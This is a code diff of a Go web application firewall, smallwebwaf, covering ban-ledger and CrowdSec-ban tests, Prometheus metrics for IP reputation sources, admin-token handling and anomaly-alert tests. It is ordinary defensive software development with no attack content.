@@ -247,7 +248,7 @@ func TestFullLedgerDropsTheEarlierBanOfTheNetblockBannedAgain(t *testing.T) {
second, _ := ledger.BanForLimit(netblock, first.Expires, bans.Notes{}) second, _ := ledger.BanForLimit(netblock, first.Expires, bans.Notes{})
held := ledger.Bans(netblock) held := ledger.Bans(netblock)
if len(held) != 1 || held[0] != second || if len(held) != 1 || !reflect.DeepEqual(held[0], second) ||
held[0].Notes.EarlierBans != (bans.EarlierBans{Limit: 1}) { held[0].Notes.EarlierBans != (bans.EarlierBans{Limit: 1}) {
t.Errorf("the ledger holds %+v, want only the second ban, "+ t.Errorf("the ledger holds %+v, want only the second ban, "+
"with 1 earlier ban for a limit", held) "with 1 earlier ban for a limit", held)
@@ -342,14 +343,14 @@ func TestWouldBanGivesTheBanWithoutMakingIt(t *testing.T) {
// While the first ban lasts, none would be made. // While the first ban lasts, none would be made.
during, would := ledger.WouldBanForAttack(netblock, midnight(), bans.Notes{}) during, would := ledger.WouldBanForAttack(netblock, midnight(), bans.Notes{})
if would || during != first { if would || !reflect.DeepEqual(during, first) {
t.Errorf("during the first ban, would ban %t with %+v, want false with %+v", t.Errorf("during the first ban, would ban %t with %+v, want false with %+v",
would, during, first) would, during, first)
} }
// As it ends, a clear sign of attack would ban for seven days, and a // As it ends, a clear sign of attack would ban for seven days, and a
// limit broken again for three hours, but neither is made. // limit broken again for three hours, but neither is made.
limitNotes := bans.Notes{Limit: 1, Window: "minute"} limitNotes := bans.Notes{Kind: "requests", Limit: 1, Window: "minute"}
attack, wouldAttack := ledger.WouldBanForAttack(netblock, first.Expires, attack, wouldAttack := ledger.WouldBanForAttack(netblock, first.Expires,
bans.Notes{RuleID: "git-dir"}) bans.Notes{RuleID: "git-dir"})
limit, wouldLimit := ledger.WouldBanForLimit(netblock, first.Expires, limitNotes) limit, wouldLimit := ledger.WouldBanForLimit(netblock, first.Expires, limitNotes)
@@ -371,7 +372,7 @@ func TestWouldBanGivesTheBanWithoutMakingIt(t *testing.T) {
// The ban made is the one that would have been. // The ban made is the one that would have been.
made, _ := ledger.BanForLimit(netblock, first.Expires, limitNotes) made, _ := ledger.BanForLimit(netblock, first.Expires, limitNotes)
if made != limit { if !reflect.DeepEqual(made, limit) {
t.Errorf("the ban made is %+v, want %+v", made, limit) t.Errorf("the ban made is %+v, want %+v", made, limit)
} }
} }
+90
View File
@@ -0,0 +1,90 @@
package bans_test
import (
"net/netip"
"reflect"
"testing"
"time"
"sneak.berlin/go/smallwebwaf/internal/bans"
)
// scenario is the scenario of the tests' CrowdSec decisions.
const scenario = "crowdsecurity/ssh-bf"
func TestCrowdSecBanLastsUntilTheDecisionEnds(t *testing.T) {
t.Parallel()
ledger := bans.New(defaultRules())
netblock := netip.MustParsePrefix("203.0.113.9/32")
expires := midnight().Add(4 * time.Hour)
// The ban that would be made is not made.
would, wouldBan := ledger.WouldBanForCrowdSec(netblock, midnight(), expires,
scenario, bans.Notes{})
if !wouldBan || len(ledger.Bans(netblock)) != 0 {
t.Errorf("would ban %t, and the ledger holds %+v, want true and nothing",
wouldBan, ledger.Bans(netblock))
}
const reason = "CrowdSec's decision for " + scenario
ban, made := ledger.BanForCrowdSec(netblock, midnight(), expires, scenario,
bans.Notes{})
if !made || !reflect.DeepEqual(ban, would) || ban.Cause != bans.CauseCrowdSec ||
!ban.Expires.Equal(expires) || ban.Reason != reason ||
ledger.Made(bans.CauseCrowdSec) != 1 {
t.Errorf("made %t the ban %+v, want the one that would be made, %+v, for "+
"crowdsec until %s", made, ban, would, expires)
}
// A second decision on the netblock while the ban lasts makes no other.
again, made := ledger.BanForCrowdSec(netblock, midnight().Add(time.Hour),
expires.Add(time.Hour), scenario, bans.Notes{})
if made || !again.Expires.Equal(expires) || ledger.Made(bans.CauseCrowdSec) != 1 {
t.Errorf("made %t the ban %+v while the first lasts, want none", made, again)
}
}
func TestCrowdSecBanIsNeverMadePermanent(t *testing.T) {
t.Parallel()
ledger := bans.New(defaultRules())
netblock := netip.MustParsePrefix("203.0.113.9/32")
expires := midnight().Add(4 * time.Hour)
ledger.BanForCrowdSec(netblock, midnight(), expires, scenario, bans.Notes{})
// A request as the ban ends is refused, and leaves it as it is.
last := expires.Add(-time.Nanosecond)
held, banned, madePermanent := ledger.Check(netblock.Addr(), last)
if !banned || madePermanent || !held.Expires.Equal(expires) ||
ledger.WouldBePermanent(netblock, last, bans.CauseCrowdSec) {
t.Errorf("as the ban ends, banned %t with %+v, made permanent %t, want "+
"refused under the ban as it was", banned, held, madePermanent)
}
if _, banned, _ := ledger.Check(netblock.Addr(), expires); banned {
t.Error("the ban refuses a request once the decision has ended")
}
}
func TestCrowdSecBanIsCountedAndDoesNotLengthenTheNextBanForALimit(t *testing.T) {
t.Parallel()
ledger := bans.New(defaultRules())
netblock := netip.MustParsePrefix("203.0.113.9/32")
// Three times the three days would be permanent; a limit broken as the
// ban for CrowdSec's decision ends bans for an hour, as a first broken
// limit does.
crowdSec, _ := ledger.BanForCrowdSec(netblock, midnight(), midnight().Add(3*day),
scenario, bans.Notes{})
limit, _ := ledger.BanForLimit(netblock, crowdSec.Expires, bans.Notes{})
if limit.Expires.Sub(limit.Start) != time.Hour ||
limit.Notes.EarlierBans != (bans.EarlierBans{CrowdSec: 1}) {
t.Errorf("the ban for a limit is %+v, want one of an hour after one for crowdsec",
limit)
}
}
+3 -2
View File
@@ -2,6 +2,7 @@ package bans_test
import ( import (
"net/netip" "net/netip"
"reflect"
"slices" "slices"
"strings" "strings"
"testing" "testing"
@@ -224,7 +225,7 @@ func TestLoadKeepsAtMostMaxBansDroppingTheEarliest(t *testing.T) {
ledger.Load([]bans.Ban{later, earlier}) ledger.Load([]bans.Ban{later, earlier})
held := ledger.Snapshot() held := ledger.Snapshot()
if len(held) != 1 || held[0] != later { if len(held) != 1 || !reflect.DeepEqual(held[0], later) {
t.Errorf("the ledger holds %+v, want only the ban that began later", held) t.Errorf("the ledger holds %+v, want only the ban that began later", held)
} }
} }
@@ -267,7 +268,7 @@ func TestLoadReplacesTheBansHeld(t *testing.T) {
bans.Notes{}) bans.Notes{})
want := []bans.Ban{first, second, kept} want := []bans.Ban{first, second, kept}
if got := ledger.Snapshot(); !slices.Equal(got, want) { if got := ledger.Snapshot(); !reflect.DeepEqual(got, want) {
t.Errorf("the ledger holds %+v, want %+v", got, want) t.Errorf("the ledger holds %+v, want %+v", got, want)
} }
} }
+864 -25
View File
File diff suppressed because it is too large Load Diff
File diff suppressed because it is too large Load Diff
+2 -1
View File
@@ -176,7 +176,8 @@ func New(params Params) *GeoJS {
// when it ends. // when it ends.
// //
// GeoJS is asked about the client's first address, which is the client's // GeoJS is asked about the client's first address, which is the client's
// own address for IPv4, and an address in the same place for an IPv6 /64. // own address for IPv4, and an address in the same place for an IPv6
// netblock.
func (g *GeoJS) LookUp(ctx context.Context, client netip.Prefix) Answer { func (g *GeoJS) LookUp(ctx context.Context, client netip.Prefix) Answer {
answer, asked := g.answerOrWait(ctx, client) answer, asked := g.answerOrWait(ctx, client)
if asked == nil { if asked == nil {
+149 -13
View File
@@ -13,8 +13,10 @@ import (
"github.com/prometheus/client_golang/prometheus/promhttp" "github.com/prometheus/client_golang/prometheus/promhttp"
"sneak.berlin/go/smallwebwaf/internal/alerts" "sneak.berlin/go/smallwebwaf/internal/alerts"
"sneak.berlin/go/smallwebwaf/internal/bans" "sneak.berlin/go/smallwebwaf/internal/bans"
"sneak.berlin/go/smallwebwaf/internal/config"
"sneak.berlin/go/smallwebwaf/internal/ratelimit" "sneak.berlin/go/smallwebwaf/internal/ratelimit"
"sneak.berlin/go/smallwebwaf/internal/remotelog" "sneak.berlin/go/smallwebwaf/internal/remotelog"
"sneak.berlin/go/smallwebwaf/internal/reputation"
"sneak.berlin/go/smallwebwaf/internal/requestlog" "sneak.berlin/go/smallwebwaf/internal/requestlog"
"sneak.berlin/go/smallwebwaf/internal/rules" "sneak.berlin/go/smallwebwaf/internal/rules"
) )
@@ -34,8 +36,11 @@ type Metrics struct {
rateLimitHits *prometheus.CounterVec rateLimitHits *prometheus.CounterVec
sizeAndTimeLimitHits *prometheus.CounterVec sizeAndTimeLimitHits *prometheus.CounterVec
offences *prometheus.CounterVec offences *prometheus.CounterVec
// ruleMatches are made by AddRules. wafMatches *prometheus.CounterVec
// ruleMatches are made by AddRules, and reputationHits by
// AddReputation.
ruleMatches *prometheus.CounterVec ruleMatches *prometheus.CounterVec
reputationHits *prometheus.CounterVec
countries *busiest countries *busiest
asns *busiest asns *busiest
@@ -59,6 +64,8 @@ type Metrics struct {
// topN is how many countries and how many AS numbers get series of their // topN is how many countries and how many AS numbers get series of their
// own (SWWAF_METRICS_TOP_N). Every metric carries instanceName // own (SWWAF_METRICS_TOP_N). Every metric carries instanceName
// (SWWAF_INSTANCE_NAME) as its label instance. // (SWWAF_INSTANCE_NAME) as its label instance.
//
//nolint:funlen // a few lines for each metric, a list that grows with them
func New(topN int, instanceName string) *Metrics { func New(topN int, instanceName string) *Metrics {
byStatus := []string{"status_class", "action"} byStatus := []string{"status_class", "action"}
byFile := []string{"file"} byFile := []string{"file"}
@@ -89,13 +96,17 @@ func New(topN int, instanceName string) *Metrics {
Help: "How long requests passed to the app took, from then to their end.", Help: "How long requests passed to the app took, from then to their end.",
}), }),
rateLimitHits: counterVec("smallwebwaf_rate_limit_hits_total", rateLimitHits: counterVec("smallwebwaf_rate_limit_hits_total",
"Requests that broke a rate limit, by its window.", "Requests that broke a rate limit, a byte limit or the error burst, by "+
[]string{"window"}), "its window and its kind, requests, bytes or refusals.",
[]string{"window", "kind"}),
sizeAndTimeLimitHits: counterVec("smallwebwaf_size_and_time_limit_hits_total", sizeAndTimeLimitHits: counterVec("smallwebwaf_size_and_time_limit_hits_total",
"Requests that passed a size or time limit, by its setting.", "Requests that passed a size or time limit, by its setting.",
[]string{"limit"}), []string{"limit"}),
offences: counterVec("smallwebwaf_offences_total", offences: counterVec("smallwebwaf_offences_total",
"Offences, by kind.", []string{"kind"}), "Offences, by kind.", []string{"kind"}),
wafMatches: counterVec("smallwebwaf_waf_matches_total",
"Requests that matched a rule of the Core Rule Set, by SWWAF_WAF_MODE "+
"and the rule's id.", []string{"mode", "rule_id"}),
countries: newCountries(topN), countries: newCountries(topN),
asns: newASNs(topN), asns: newASNs(topN),
GeoJSRequests: prometheus.NewCounter(prometheus.CounterOpts{ GeoJSRequests: prometheus.NewCounter(prometheus.CounterOpts{
@@ -131,7 +142,8 @@ func New(topN int, instanceName string) *Metrics {
collectors.NewProcessCollector(collectors.ProcessCollectorOpts{}), collectors.NewProcessCollector(collectors.ProcessCollectorOpts{}),
m.inFlight, m.requests, m.requestBytes, m.responseBytes, m.inFlight, m.requests, m.requestBytes, m.responseBytes,
m.requestDuration, m.upstreamDuration, m.requestDuration, m.upstreamDuration,
m.rateLimitHits, m.sizeAndTimeLimitHits, m.offences, m.countries, m.asns, m.rateLimitHits, m.sizeAndTimeLimitHits, m.offences, m.wafMatches,
m.countries, m.asns,
m.GeoJSRequests, m.GeoJSFailures, m.GeoJSUnanswered, m.GeoJSRequests, m.GeoJSFailures, m.GeoJSUnanswered,
m.stateFileWrites, m.stateFileWriteFailures, m.stateFileWrites, m.stateFileWriteFailures,
m.stateFileLastWrite, m.stateFileSize, m.stateFileLastWrite, m.stateFileSize,
@@ -148,7 +160,9 @@ func New(topN int, instanceName string) *Metrics {
func (m *Metrics) AddBansAndClients( func (m *Metrics) AddBansAndClients(
ledger *bans.Ledger, limiter *ratelimit.Limiter, now func() time.Time, ledger *bans.Ledger, limiter *ratelimit.Limiter, now func() time.Time,
) { ) {
for _, cause := range []string{bans.CauseLimit, bans.CauseAttack, bans.CauseAdmin} { for _, cause := range []string{
bans.CauseLimit, bans.CauseAttack, bans.CauseAdmin, bans.CauseCrowdSec,
} {
m.registry.MustRegister(prometheus.NewCounterFunc(prometheus.CounterOpts{ m.registry.MustRegister(prometheus.NewCounterFunc(prometheus.CounterOpts{
Name: "smallwebwaf_bans_made_total", Name: "smallwebwaf_bans_made_total",
Help: "Bans made, by cause.", Help: "Bans made, by cause.",
@@ -251,6 +265,81 @@ func (m *Metrics) AddLookupFile(lastRead func() time.Time, readFailures func() i
) )
} }
// sourceLabel is the label of the reputation metrics: a list's URL, a
// DNSBL zone, its key masked, or abuseipdb.
const sourceLabel = "source"
// AddReputation adds the metrics of the lists fetched from URLs and of the
// DNSBL zones, by source, each list's URL or each zone, its key masked as
// config.MaskZoneKey masks it: the requests whose client a blocklist, the
// CrowdSec decision list, a zone's verdict or AbuseIPDB's score lists,
// which ReputationHit counts, and, read from lists and dnsbl as the
// metrics are asked for, for a list, the fetches that failed and when the
// copy in use was fetched, and for a zone, the queries made and those that
// failed. It is called once, before ReputationHit.
func (m *Metrics) AddReputation(lists *reputation.Lists, dnsbl *reputation.DNSBL) {
m.reputationHits = counterVec("smallwebwaf_reputation_hits_total",
"Requests whose client a blocklist, the CrowdSec decision list, a DNSBL "+
"zone or AbuseIPDB lists, by the list's URL, the zone, or abuseipdb.",
[]string{sourceLabel})
m.registry.MustRegister(m.reputationHits)
for _, zone := range dnsbl.Zones() {
source := prometheus.Labels{sourceLabel: config.MaskZoneKey(zone)}
m.addReputationQueries(source, func() int { return dnsbl.Queries(zone) })
m.addReputationFailures(source, func() int { return dnsbl.Failures(zone) })
}
for _, listURL := range lists.URLs() {
source := prometheus.Labels{sourceLabel: listURL}
m.addReputationFailures(source, func() int { return lists.Failures(listURL) })
m.registry.MustRegister(
prometheus.NewGaugeFunc(prometheus.GaugeOpts{
Name: "smallwebwaf_reputation_last_fetch_timestamp_seconds",
Help: "When the copy of the list in use was fetched, in seconds since " +
"1970, or 0 while there is none.",
ConstLabels: source,
}, func() float64 {
fetched := lists.Fetched(listURL)
if fetched.IsZero() {
return 0
}
return float64(fetched.Unix())
}),
)
}
}
// AddAbuseIPDB adds the metrics of AbuseIPDB, with the source abuseipdb,
// read from abuseIPDB as the metrics are asked for: the checks made, those
// that failed, and how many checks the day's budget has left. It is
// called once, after AddReputation, while SWWAF_ABUSEIPDB_KEY is set.
func (m *Metrics) AddAbuseIPDB(abuseIPDB *reputation.AbuseIPDB) {
source := prometheus.Labels{sourceLabel: reputation.AbuseIPDBSource}
m.addReputationQueries(source, abuseIPDB.Checked)
m.addReputationFailures(source, abuseIPDB.Failures)
m.registry.MustRegister(
prometheus.NewGaugeFunc(prometheus.GaugeOpts{
Name: "smallwebwaf_reputation_daily_budget_remaining",
Help: "Checks of the day's SWWAF_ABUSEIPDB_DAILY_BUDGET not yet spent.",
ConstLabels: source,
}, func() float64 {
return float64(abuseIPDB.BudgetLeft())
}),
)
}
// ReputationHit counts a request whose client source lists: a blocklist
// or the CrowdSec decision list, by its URL, a DNSBL zone, its key masked,
// or AbuseIPDB, abuseipdb.
func (m *Metrics) ReputationHit(source string) {
m.reputationHits.WithLabelValues(source).Inc()
}
// AddAlerts adds the metrics of the alerts sent to each destination set, // AddAlerts adds the metrics of the alerts sent to each destination set,
// read from queue as the metrics are asked for, by destination: the // read from queue as the metrics are asked for, by destination: the
// alerts sent, the requests to the destination that failed, the alerts // alerts sent, the requests to the destination that failed, the alerts
@@ -324,18 +413,10 @@ func (m *Metrics) RequestEnded(
m.upstreamDuration.Observe(upstreamDuration.Seconds()) m.upstreamDuration.Observe(upstreamDuration.Seconds())
} }
if line.LimitHit != "" {
m.rateLimitHits.WithLabelValues(line.LimitHit).Inc()
}
if limit != "" { if limit != "" {
m.sizeAndTimeLimitHits.WithLabelValues(limit).Inc() m.sizeAndTimeLimitHits.WithLabelValues(limit).Inc()
} }
if line.Offence != "" {
m.offences.WithLabelValues(line.Offence).Inc()
}
if line.Country != "" { if line.Country != "" {
m.countries.add(line.Country, line) m.countries.add(line.Country, line)
} }
@@ -345,12 +426,41 @@ func (m *Metrics) RequestEnded(
} }
} }
// LimitHit counts a request that broke a rate limit, a byte limit or the
// error burst, by the window and the kind of hit.
func (m *Metrics) LimitHit(hit ratelimit.Hit) {
m.rateLimitHits.WithLabelValues(hit.Window, hit.Kind).Inc()
}
// Offences counts the offences of r, a request that has ended, as its
// client's history counts them, by kind, named as clients.json names
// them.
func (m *Metrics) Offences(r ratelimit.Request) {
for kind, committed := range map[string]bool{
"limit": r.BrokeLimit,
"attack": r.Attack,
"rule_blocked": r.RuleBlocked,
"waf_blocked": r.WAFBlocked,
"token_refused": r.TokenRefused,
} {
if committed {
m.offences.WithLabelValues(kind).Inc()
}
}
}
// RuleMatched counts a request that matched the rule id, whose action is // RuleMatched counts a request that matched the rule id, whose action is
// action. // action.
func (m *Metrics) RuleMatched(id, action string) { func (m *Metrics) RuleMatched(id, action string) {
m.ruleMatches.WithLabelValues(id, action).Inc() m.ruleMatches.WithLabelValues(id, action).Inc()
} }
// WAFMatched counts a request that matched the Core Rule Set's rule id,
// with SWWAF_WAF_MODE at mode.
func (m *Metrics) WAFMatched(mode string, id int) {
m.wafMatches.WithLabelValues(mode, strconv.Itoa(id)).Inc()
}
// StateFileWritten counts a write of the state file name, of size bytes, // StateFileWritten counts a write of the state file name, of size bytes,
// that ended with err. // that ended with err.
func (m *Metrics) StateFileWritten(name string, size int, err error) { func (m *Metrics) StateFileWritten(name string, size int, err error) {
@@ -382,6 +492,32 @@ func (m *Metrics) StateFileEditSetAside(name string) {
m.stateFileEditsSetAside.WithLabelValues(name).Inc() m.stateFileEditsSetAside.WithLabelValues(name).Inc()
} }
// addReputationQueries adds the counter of the queries to source, a DNSBL
// zone, or of the checks of clients with AbuseIPDB, which count tells.
func (m *Metrics) addReputationQueries(source prometheus.Labels, count func() int) {
m.registry.MustRegister(prometheus.NewCounterFunc(prometheus.CounterOpts{
Name: "smallwebwaf_reputation_queries_total",
Help: "Queries to the DNSBL zone, or checks of clients with AbuseIPDB.",
ConstLabels: source,
}, func() float64 {
return float64(count())
}))
}
// addReputationFailures adds the counter of the fetches of source, a
// list, the queries to it, a DNSBL zone, or the checks with it, AbuseIPDB,
// that failed, which count tells.
func (m *Metrics) addReputationFailures(source prometheus.Labels, count func() int) {
m.registry.MustRegister(prometheus.NewCounterFunc(prometheus.CounterOpts{
Name: "smallwebwaf_reputation_failures_total",
Help: "Fetches of the list, queries to the DNSBL zone, or checks with " +
"AbuseIPDB, that failed.",
ConstLabels: source,
}, func() float64 {
return float64(count())
}))
}
// statusClass returns the class of status, such as 2xx, or none when no // statusClass returns the class of status, such as 2xx, or none when no
// status was sent. // status was sent.
func statusClass(status int) string { func statusClass(status int) string {
+5 -3
View File
@@ -45,8 +45,9 @@ var (
// /_smallwebwaf/, once it has passed the checks. Each endpoint needs a // /_smallwebwaf/, once it has passed the checks. Each endpoint needs a
// token, sent as Authorization: Bearer <token>: the metrics // token, sent as Authorization: Bearer <token>: the metrics
// SWWAF_METRICS_TOKEN, the others SWWAF_ADMIN_TOKEN. A request without // SWWAF_METRICS_TOKEN, the others SWWAF_ADMIN_TOKEN. A request without
// it is refused with 401. An endpoint whose token is unset answers 404, // it is refused with 401, which counts toward the error burst. An
// as any other request under /_smallwebwaf/ does. // endpoint whose token is unset answers 404, as any other request under
// /_smallwebwaf/ does.
func (rq *request) answerAdmin() { func (rq *request) answerAdmin() {
rq.line.Action = requestlog.ActionAdmin rq.line.Action = requestlog.ActionAdmin
rq.startClientResponseTimeout() rq.startClientResponseTimeout()
@@ -57,6 +58,7 @@ func (rq *request) answerAdmin() {
case token == "": case token == "":
http.Error(rq.out, http.StatusText(http.StatusNotFound), http.StatusNotFound) http.Error(rq.out, http.StatusText(http.StatusNotFound), http.StatusNotFound)
case !hasToken(rq.in, token): case !hasToken(rq.in, token):
rq.tokenRefused = true
rq.out.Header().Set("WWW-Authenticate", "Bearer") rq.out.Header().Set("WWW-Authenticate", "Bearer")
rq.answer(refusal{ rq.answer(refusal{
status: http.StatusUnauthorized, status: http.StatusUnauthorized,
@@ -282,7 +284,7 @@ func (rq *request) showClient() {
answer := clientAnswer{Bans: state.BanEntries(rq.h.ledger.Covering(addr))} answer := clientAnswer{Bans: state.BanEntries(rq.h.ledger.Covering(addr))}
client, seen := rq.h.limiter.Client(clientGroup(addr)) client, seen := rq.h.limiter.Client(rq.h.clientGroup(addr))
if seen { if seen {
answer.Client = &client answer.Client = &client
} }
+3 -3
View File
@@ -4,7 +4,7 @@ import (
"encoding/json" "encoding/json"
"net/http" "net/http"
"net/netip" "net/netip"
"slices" "reflect"
"strconv" "strconv"
"strings" "strings"
"testing" "testing"
@@ -48,7 +48,7 @@ func TestAdminEndpointsAreOffWhileTheTokenIsUnset(t *testing.T) {
} }
} }
if after := server.Ledger.Snapshot(); !slices.Equal(after, before) { if after := server.Ledger.Snapshot(); !reflect.DeepEqual(after, before) {
t.Errorf("the bans are now\n%+v\nwant them unchanged\n%+v", after, before) t.Errorf("the bans are now\n%+v\nwant them unchanged\n%+v", after, before)
} }
} }
@@ -79,7 +79,7 @@ func TestAdminEndpointsNeedTheAdminToken(t *testing.T) {
} }
} }
if after := server.Ledger.Snapshot(); !slices.Equal(after, before) { if after := server.Ledger.Snapshot(); !reflect.DeepEqual(after, before) {
t.Errorf("%s %s without the token changed the bans to\n%+v\nfrom\n%+v", t.Errorf("%s %s without the token changed the bans to\n%+v\nfrom\n%+v",
e.method, e.path, after, before) e.method, e.path, after, before)
} }
+12 -2
View File
@@ -118,7 +118,8 @@ func TestObserveModeRaisesTheBanAlertsItWouldHave(t *testing.T) {
line := s.get(ipv6Client, http.StatusOK, requestlog.ActionForward) line := s.get(ipv6Client, http.StatusOK, requestlog.ActionForward)
// No ban is made, and none made permanent. // No ban is made, and none made permanent.
if held := server.Ledger.Snapshot(); len(held) != 1 || held[0] != attackBan || held := server.Ledger.Snapshot()
if len(held) != 1 || !reflect.DeepEqual(held[0], attackBan) ||
line.BanExpires != requestlog.FormatTime(attackBan.Expires) { line.BanExpires != requestlog.FormatTime(attackBan.Expires) {
t.Errorf("the ledger holds %+v, and the log line gives %s, want the ban "+ t.Errorf("the ledger holds %+v, and the log line gives %s, want the ban "+
"for the attack alone, as it was", held, line.BanExpires) "for the attack alone, as it was", held, line.BanExpires)
@@ -203,7 +204,16 @@ func startWithAlerts(
) (*sender, *clock, *proxy.Server, *alerts.Queue) { ) (*sender, *clock, *proxy.Server, *alerts.Queue) {
t.Helper() t.Helper()
app := startApp(t, func(http.ResponseWriter, *http.Request) {}) return startAppWithAlerts(t, func(http.ResponseWriter, *http.Request) {}, env)
}
// startAppWithAlerts is startWithAlerts in front of the app handler.
func startAppWithAlerts(
t *testing.T, handler http.HandlerFunc, env map[string]string,
) (*sender, *clock, *proxy.Server, *alerts.Queue) {
t.Helper()
app := startApp(t, handler)
clk := &clock{now: time.Date(2026, 10, 6, 0, 0, 0, 0, time.UTC)} clk := &clock{now: time.Date(2026, 10, 6, 0, 0, 0, 0, time.UTC)}
settings := map[string]string{ settings := map[string]string{
trustedProxies: trustLocalhost, trustedProxies: trustLocalhost,
+30
View File
@@ -0,0 +1,30 @@
package proxy
import (
"net/netip"
"testing"
"sneak.berlin/go/smallwebwaf/internal/config"
)
func TestWithEveryAnomalyThresholdOffARequestIsNotCounted(t *testing.T) {
t.Parallel()
// A request from a client looked up through GeoJS, with every anomaly
// threshold off. Its handler has neither GeoJS's answers nor the
// anomaly counters, nor a clock, and the request no response: reading
// any of them to count the request panics.
rq := &request{
h: &handler{config: &config.Config{LookupSource: "geojs"}},
client: netip.MustParseAddr("203.0.113.9"),
lookedUp: true,
}
defer func() {
if r := recover(); r != nil {
t.Errorf("counting the request did work, with every threshold off: %v", r)
}
}()
rq.countAnomalies()
}
+377
View File
@@ -0,0 +1,377 @@
package proxy_test
import (
"maps"
"net/http"
"net/netip"
"reflect"
"slices"
"strconv"
"sync/atomic"
"testing"
"time"
"sneak.berlin/go/smallwebwaf/internal/alerts"
"sneak.berlin/go/smallwebwaf/internal/anomaly"
"sneak.berlin/go/smallwebwaf/internal/proxy"
"sneak.berlin/go/smallwebwaf/internal/ratelimit"
"sneak.berlin/go/smallwebwaf/internal/requestlog"
)
// The anomaly thresholds: the prefix of a scope followed by the end of a
// count.
const (
anomalyClient = "SWWAF_ANOMALY_CLIENT_"
anomalyNet = "SWWAF_ANOMALY_NET_"
anomalyASN = "SWWAF_ANOMALY_ASN_"
anomalyTotal = "SWWAF_ANOMALY_TOTAL_"
anomalyWatch = "SWWAF_WATCH_"
requestsPerMinute = "REQUESTS_PER_MINUTE"
requestsPerHour = "REQUESTS_PER_HOUR"
bytesPerMinute = "BYTES_PER_MINUTE"
bytesPerHour = "BYTES_PER_HOUR"
)
// The other anomaly settings.
const (
anomalyNetV4Prefix = "SWWAF_ANOMALY_NET_V4_PREFIX"
anomalyNetV6Prefix = "SWWAF_ANOMALY_NET_V6_PREFIX"
watchNets = "SWWAF_WATCH_NETS"
)
const (
// clientsNet is the netblock around client at the default length, and
// office a named netblock of the same.
clientsNet = "203.0.113.0/24"
office = "office=" + clientsNet
// aLot is a threshold no test reaches.
aLot = "1000"
// hour is the window an alert names for a threshold per hour.
hour = "hour"
)
func TestEachScopeAndWindowOverItsThresholdAlertsOncePerCooldown(t *testing.T) {
t.Parallel()
for _, scope := range []struct {
prefix, scope string
// netblock is the alert's, and counted what its reason names. extra
// is what its detail gives besides what every anomaly alert's does.
netblock netip.Prefix
counted string
extra map[string]any
}{
{
anomalyClient, anomaly.ScopeClient, netip.MustParsePrefix(client + "/32"),
"the client " + client + "/32", nil,
},
{
anomalyNet, anomaly.ScopeNet, netip.MustParsePrefix(clientsNet),
"the netblock " + clientsNet, nil,
},
{anomalyASN, anomaly.ScopeASN, netip.Prefix{}, asnDE, map[string]any{"asn": asnDE}},
{anomalyTotal, anomaly.ScopeTotal, netip.Prefix{}, "the whole service", nil},
{
anomalyWatch, anomaly.ScopeWatch, netip.MustParsePrefix(clientsNet),
"the named netblock office, " + clientsNet, map[string]any{"name": "office"},
},
} {
for _, threshold := range []struct {
end, kind, window string
// value is the threshold, which the third upload of 100 bytes
// takes the count over, to count.
value int64
count float64
}{
{requestsPerMinute, ratelimit.KindRequests, minute, 2, 3},
{requestsPerHour, ratelimit.KindRequests, hour, 2, 3},
{bytesPerMinute, ratelimit.KindBytes, minute, 250, 300},
{bytesPerHour, ratelimit.KindBytes, hour, 250, 300},
} {
setting := scope.prefix + threshold.end
value := strconv.FormatInt(threshold.value, 10)
t.Run(setting, func(t *testing.T) {
t.Parallel()
s, clk, server, queue := startWithLookupsAndClock(t, map[string]string{
setting: value, watchNets: office,
})
start := clk.Now()
// The third upload takes the count over the threshold, and the
// fourth, within the cooldown, is held back. Each is passed to
// the app.
for range 4 {
s.uploadFrom(client)
}
detail := map[string]any{
"scope": scope.scope, "window": threshold.window, "kind": threshold.kind,
"count": threshold.count, "threshold": threshold.value,
}
maps.Copy(detail, scope.extra)
wantAlerts(t, queue, alerts.Alert{
Instance: alertInstance,
Time: start,
Event: alerts.EventAnomaly,
Client: netip.MustParseAddr(client),
Netblock: scope.netblock,
ASN: asnDE,
ASName: asNameDE,
Country: "DE",
Reason: threshold.kind + " per " + threshold.window + " of " +
scope.counted + " over the threshold of " + value,
Detail: detail,
})
wantAlertedAgainOnceTheCooldownHasRunOut(t, s, clk, queue)
if held := server.Ledger.Snapshot(); len(held) != 0 {
t.Errorf("the ledger holds %+v, want no ban", held)
}
})
}
}
}
// wantAlertedAgainOnceTheCooldownHasRunOut checks that, once the cooldown
// has run out after a first alert, which held back one repeat, the next
// count over the threshold, at the latest three uploads from client on,
// raises another alert, giving that repeat.
func wantAlertedAgainOnceTheCooldownHasRunOut(
t *testing.T, s *sender, clk *clock, queue *alerts.Queue,
) {
t.Helper()
clk.advance(15 * time.Minute)
for range 3 {
s.uploadFrom(client)
}
waiting := queue.Snapshot().Waiting[alerts.DestinationWebhook]
if len(waiting) != 2 || !waiting[1].Time.Equal(clk.Now()) ||
waiting[1].SuppressedRepeats != 1 {
t.Errorf("alerts wait %+v, want the first and another, with 1 repeat", waiting)
}
}
func TestEveryRequestIsCountedWhateverIsDoneWithIt(t *testing.T) {
t.Parallel()
const (
allowed = "192.0.2.7" // in SWWAF_ALLOW_NETS
exempt = "192.0.2.10" // in SWWAF_RATE_LIMIT_EXEMPT_NETS
denied = "192.0.2.20" // in SWWAF_DENY_NETS
)
s, _, _, queue := startAppWithAlerts(t, readAndAnswer, map[string]string{
anomalyClient + requestsPerMinute: "2",
allowNets: allowed,
rateLimitExemptNets: exempt,
rateLimitExemptPaths: "/static/",
denyNets: denied,
})
// The third request of each takes its client's count over the threshold
// of 2.
for _, sent := range []struct {
from, path string
status int
action string
}{
{allowed, "/", http.StatusOK, requestlog.ActionForward},
{exempt, "/", http.StatusOK, requestlog.ActionForward},
{client, "/static/app.js", http.StatusOK, requestlog.ActionForward},
{denied, "/", http.StatusForbidden, requestlog.ActionDenied},
} {
for range 3 {
s.request(sent.from, sent.path, sent.status, sent.action)
}
}
waiting := queue.Snapshot().Waiting[alerts.DestinationWebhook]
got := make([]string, 0, len(waiting))
for _, alert := range waiting {
got = append(got, alert.Client.String())
}
if want := []string{allowed, exempt, client, denied}; !slices.Equal(got, want) {
t.Errorf("alerts for the clients %v, want %v", got, want)
}
}
func TestThresholdsOffCountNothingAndAlertNothing(t *testing.T) {
t.Parallel()
// With every threshold off, nothing is counted.
s, server, queue := startWithLookups(t, map[string]string{watchNets: office})
for range 5 {
s.uploadFrom(client)
}
if counters := server.Anomalies.Snapshot(); len(counters) != 0 {
t.Errorf("counters %+v, want none", counters)
}
wantAlerts(t, queue)
// With one set, its count alone is counted, in its scope alone.
s, clk, server, queue := startWithLookupsAndClock(t, map[string]string{
anomalyNet + requestsPerMinute: aLot, watchNets: office,
})
